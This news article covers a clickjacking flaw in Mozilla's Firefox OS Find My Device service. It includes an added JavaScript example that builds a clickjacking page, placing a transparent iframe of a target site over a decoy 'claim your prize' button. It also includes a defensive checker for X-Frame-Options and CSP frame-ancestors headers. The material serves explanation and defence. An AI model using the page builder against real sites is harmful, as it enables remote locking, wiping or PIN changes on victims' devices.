A security researcher has found that Mozilla's Find My Device feature for Firefox OS can let attackers remotely lock or wipe phones running the operating system and even change the device's PIN.
Similar to the feature Apple offers iPhone users, Firefox Find My Device lets a user who has lost a Firefox OS smartphone lock the device remotely or pin its location on a map, which can help them recover the handset or give law enforcement its exact location to catch the thief.
However, Egyptian security researcher Mohamed A. Baset discovered a vulnerability in Firefox Find My Device that allows attackers to remotely wipe Firefox OS smartphones. Baset found that the Find My Device website could be loaded inside a hidden iframe on an attacker-controlled page, a simple clickjacking technique: a user who is signed in to the service and visits that page can be tricked into clicking invisible controls in the framed site. The attacker can then lock or unlock the phone's screen, set a new PIN, or make the handset ring at maximum volume for one minute even if the user has put it in vibrate or silent mode.
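As an added illustration (example code written for this article, not code from Mozilla, from the Find My Device service or from the researcher), the following JavaScript shows the two sides of the clickjacking technique described above: a function that builds an attacker page with the target site in a transparent iframe positioned over a decoy button, and a function that checks whether a site's response headers (X-Frame-Options or a Content-Security-Policy frame-ancestors directive) would stop a browser from framing it at all. The target URL, the decoy text and the button coordinates are assumptions; the real layout and headers of Mozilla's site are not given in the article.

```javascript
// Added example, not code from the article, from Mozilla or from the researcher.
// Part 1 builds the kind of page a clickjacking attack uses: the target site is
// loaded in an iframe made fully transparent and laid over a decoy button, so a
// logged-in victim who clicks the decoy really clicks the framed site's button.
// Part 2 is the defender's check: given a target's response headers, would a
// browser refuse to frame it? The target URL, the decoy text and the button
// coordinates are assumptions; the real Find My Device layout is not known here.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g,
    (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// decoyAt: where the visible decoy button sits on the attacker page.
// targetButtonAt: where the sensitive button sits inside the framed page (assumed).
function buildClickjackPage({ targetUrl, decoyLabel, decoyAt, targetButtonAt }) {
  // Shift the transparent frame so the target's real button lands on the decoy.
  const left = decoyAt.x - targetButtonAt.x;
  const top = decoyAt.y - targetButtonAt.y;
  return [
    '<!doctype html>',
    '<html><head><meta charset="utf-8"><style>',
    `  #decoy  { position:absolute; left:${decoyAt.x}px; top:${decoyAt.y}px; z-index:1; }`,
    `  #target { position:absolute; left:${left}px; top:${top}px; width:1200px; height:900px;`,
    '            border:0; opacity:0; z-index:2; } /* invisible, but still receives the click */',
    '</style></head><body>',
    `  <button id="decoy">${escapeHtml(decoyLabel)}</button>`,
    `  <iframe id="target" src="${escapeHtml(targetUrl)}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

function headerValue(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? undefined : headers[key];
}

// Does one CSP frame-ancestors source expression permit framerOrigin to embed targetOrigin?
function sourceMatches(src, targetOrigin, framerOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return framerOrigin === targetOrigin;
  if (src === '*') return true;
  const framer = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return framer.protocol === src.toLowerCase(); // e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/\s]+)(?::(\d+|\*))?(?:\/.*)?$/i.exec(src);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && framer.protocol !== scheme.toLowerCase() + ':') return false;
  const h = host.toLowerCase();
  const hostOk = h.startsWith('*.') ? framer.hostname.endsWith(h.slice(1)) : framer.hostname === h;
  const framerPort = framer.port || (framer.protocol === 'https:' ? '443' : '80');
  const portOk = !port || port === '*' || port === framerPort;
  return hostOk && portOk;
}

// True if a browser fetching targetOrigin's page with these headers would refuse to
// render it inside a frame hosted at framerOrigin. A CSP frame-ancestors directive
// takes precedence over X-Frame-Options, as browsers do.
function framingBlocked(headers, targetOrigin, framerOrigin) {
  const csp = headerValue(headers, 'content-security-policy');
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => /^frame-ancestors(\s|$)/i.test(d));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1).map((s) => s.toLowerCase());
      return !sources.some((s) => sourceMatches(s, targetOrigin, framerOrigin));
    }
  }
  const xfo = headerValue(headers, 'x-frame-options');
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return true;
    if (v === 'SAMEORIGIN') return framerOrigin !== targetOrigin;
    // Anything else (including the obsolete ALLOW-FROM) is ignored by current browsers.
  }
  return false; // no framing protection at all: the page can be clickjacked
}

// Constructed sample: a hypothetical lost-device service and an attacker page.
const TARGET = 'https://findmydevice.example';
const ATTACKER = 'https://evil.example';

const SAMPLE_PAGE = buildClickjackPage({
  targetUrl: TARGET + '/devices',
  decoyLabel: 'Click to claim your prize',
  decoyAt: { x: 100, y: 200 },
  targetButtonAt: { x: 40, y: 60 },
});
console.log(SAMPLE_PAGE);
console.log('no headers           ->', framingBlocked({}, TARGET, ATTACKER));
console.log('frame-ancestors none ->',
  framingBlocked({ 'Content-Security-Policy': "frame-ancestors 'none'" }, TARGET, ATTACKER));
```

Run it with Node to print the attack page and the two header checks. The defensive takeaway is the second function: a lost-device control page that sends `Content-Security-Policy: frame-ancestors 'none'` (with `X-Frame-Options: DENY` as a fallback for older browsers) cannot be loaded in an attacker's iframe at all, which removes the clickjacking vector regardless of which buttons the page exposes.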
The vulnerability would also let a thief who has stolen a phone craft a web page that unlocks the PIN-protected device at the push of a button. According to Baset, the National Institute of Standards and Technology gave the vulnerability a CVSS (Common Vulnerability Scoring System) base score of 7.8 out of 10 and an exploitability subscore of 10 out of 10, meaning that even attackers with little technical skill could exploit the flaw in Firefox Find My Device.
The flaw appears to be the same one Baset reported last year, and a variation of CVE-2014-8346, which affected Samsung's Find My Mobile service.